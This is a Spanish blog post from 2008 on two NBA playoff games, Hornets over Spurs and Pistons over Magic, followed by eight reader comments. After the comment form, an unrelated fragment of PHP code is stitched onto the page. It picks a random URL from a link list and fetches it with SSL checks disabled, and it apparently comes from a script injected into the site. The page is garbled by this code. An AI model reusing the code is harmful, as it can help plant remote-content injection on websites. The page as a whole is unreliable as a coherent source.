En la cresta de la ola

06 de May de 2008 por txusma

En la cresta de la ola (SAS 84 – NOH 102)

Es cierto. Habían luchado hasta el final por ser los mejores del Oeste, tenían en sus filas a un jugador que no desmerecería el MVP, habían eliminado a Dirk y sus compañeros en primera ronda con suficiente solvencia… pero aun así a nadie deja de sorprender que New Orleans este dominado a San Antonio de la manera que lo esté haciendo. Desde el año 2001, los Spurs no se habían visto con un 0-2 en contra en la eliminatoria y en aquella ocasión acabaron siendo barridos por los Lakers de O’Neal y Bryant. Ahora deberán apelar a todo su orgullo de campeón para superar este difícil escollo.

En los Hornets hay una premisa que casi siempre se repite: Chris Paul es uno de los destacados del partido. Después puede ser David West o Tyson Chandler o Pedja Stojakovic, pero Chris Paul siempre cumple. Anoche 30 puntos, 12 asistencias y una sensación de poderío y control inmensa que hizo palidecer a Tony Parker. La defensa funcionó a la perfección y ni el base francés, ni Tim Duncan ni Manu Ginóbili consiguieron imponer su juego en ningún momento. En cambio en ataque, entre Chris Paul y Pedja Stojakovic se bastaron para anotar 55 puntos y plantar la semilla de la duda en jugadores y aficionados tejanos. La eliminatoria está más interesante que nunca, seguramente siguiendo un guión que poca gente esperaba y eso, a los espectadores nos encanta. No habrá que perderse ni un detalle de los siguientes episodios.

Una sola jugada (ORL 93 – DET 100)

Lo que fue un partido intensísimo con alternancias en el marcador y oportunidades hasta los segundos finales para los 2 equipos será recordado seguramente por una sola jugada. Al final del tercer cuarto, Detroit sacó de fondo con 5.1 segundos por delante pero el reloj de la mesa se congeló misteriosamente a 4.8 segundos para el final. La jugada continuó y Chancey Billups acabó anotando un triple ante las vehementes protestas de Stan Van Gundy el resto del banquillo de Florida. Según la TNT el tiro se produjo cuando habían pasado ya 5.2 segundos y por tanto no debería haber sido válido pero desgraciadamente las normas de la NBA no permiten la repetición de jugadas en este tipo de situaciones. En un partido tan igualado como el de ayer, este triple de Billups pudo resultar realmente decisivo.

Y es que Orlando llegó con opciones a los últimos segundos en los que, perdiendo de dos puntos a falta de 11 segundos, Rashard Lewis falló una bandeja, Dwight Howard no consiguió recoger el rebote ofensivo y a Hedo Turkoglu se le escapó finalmente el balón. Una esperpéntica jugada que viene a demostrar el que fue el talón de Aquiles de los Magic durante el partido, las pérdidas. Nada más y nada menos que 17 entre Lewis, Howard y Turkoglu. En cambio, Dwight Howard consiguió sacarse la espina de su mal partido anterior y acabó con unos excelentes 22 puntos y 18 rebotes, convirtiéndose en la principal amenaza ofensiva y defensiva de su equipo y causando problemas de faltas a todos sus defensores. Por parte de los Pistons, un partido clásico con todos los jugadores anotando y aportando, aunque esta vez fue Billups el más destacado.

Orlando vuelve a casa con un 0-2 en contra pero con la confianza de que no está todo decidido y que la eliminatoria es más igualada de lo que refleja en estos momento el marcador.

Comenta

8 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Madre mía… otra debacle de Spurs en el tercer cuarto… va a ser que les está molando descansar en el último.
    Si a los campeones les dejan de funcionar Parker y Ginobili apaga y vamonos (¿año par???)

    Bastante coña Detroit… pero creo que terminarán prontito. Yo no la veo tan igualada.

      Citar

  2. telekoman dice:
    #2

    El problema fundamental de Detroit es el que ya se sabía a principios de temporada: El banquillo. La aportación se limita a 6 hombres si contamos hoy a McDyess que ha conseguido 8 rebotes y se ha fajado con Howard. En cuanto a puntos sólo aportan los titulares y eso se va a pagar. No creo que en esta eliminatoria, si no contra Boston. Esperemos que la temporada que viene los Stuckey, Afflalo, amir Johnson o Hermann, den un pasito al frente que permita hacer el cambio generacional un poco más suave de lo que se presupone.

      Citar

  3. TheDeerHunter dice:
    #3

    Cuando hablas de cambio generacional deberías decir RECONSTRUCCIÓN.

    No hay cambio generacional que valga en Detroit.

      Citar

  4. telekoman dice:
    #4

    No, quiero decir cambio generacional. Para mi reconstrucción es un proceso totalmente destructivo para empezar de cero y tirarse al menos 3 temporadas en blanco. No creo que lo que se vaya a hacer en Detroit sea exactamente eso. Ahora no tengo el dato de las finalizaciones de contratos de los jugadores titulares de Detroit, pero creo que la idea de Dumars es hacerlo mucho más gradual que lo que supone una recostrucción. Claro que me puedo equivocar.

      Citar

  5. TheDeerHunter dice:
    #5

    Entiendo lo que dices, pero por las características de la actual plantilla me cuesta mucho creer que se pueda hacer de esta manera.

    No existe ni un solo pilar para el futuro. El equipo está basado en 4 tipos ya machuchetes que cuando se retiren lo harán en un corto espacio de tiempo.
    Llevan demasiados años sin primeras rondas del Draft. En algún momento tendrán que acceder a ellas, porque si lo que quieren es construir un equipo a base de talonario lo tienen claro…

      Citar

  6. Gallis dice:
    #6

    Mmm, pues la NBA no debería permitirse “cagadas” como la de esa jugada…pero polémicas aparte, me pasa como a Deer, no veo la eliminatoria muy igualada, 4-1 como mucho tal y como se han puesto las cosas. A ver que pasa.

    Lo de NO por más que pueda ser esperado, no deja de sorprenderme. Ganan con demasiada solvencia. Anoche en la primera parte se veía que en cuanto dieran un pequeño arreón los Hornets se llevaban el gato al agua…y el arreón fue de aúpa. Eso sí, ayer si estuvo bien Paul (muy biem de hecho). En el primer partido no me gusto mucho y desde luego, no fue decisivo. El primer partido lo ganaron entre West y Stojakovic, y en el último cuarto, con todo decidido, Paul se unió a la fiesta…

    Queda serie, pero no se yo si los Spurs no han “dado” demasiado ventaja.

      Citar

  7. Viva_Dirk dice:
    #7

    Yo ya les di un 4-1 a los Hornets, van un par de ritmos por encima de San Antonio y defiende como leones. Están haciendo un gran trabajo sobre Duncan y Ginóbili ayer estuvo horrible.

    Los Pistons pasarán, no se si con mas o menos apuros pero no veo a Orlando ganando con los recursos que ha utilizado este año. Piezas de futuro tiene algunas, de momento ninguno es muy importante pero tiene varios jóvenes interesantes.

      Citar

  8. Gallis dice:
    #8

    Acabo de ver el resumen del Pistons-Magic y aparte de lo del reloj, que manda narices que pasen estas cosas en una liga tan profesionalizada, hay una jugada brutal…

    Con 95-93 a favor de los Pistons, hay una entrada de Lewis que he tenido que ver 3 veces para contar todas las faltas que le hacen a Lewis y a Howard, jojojojo…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>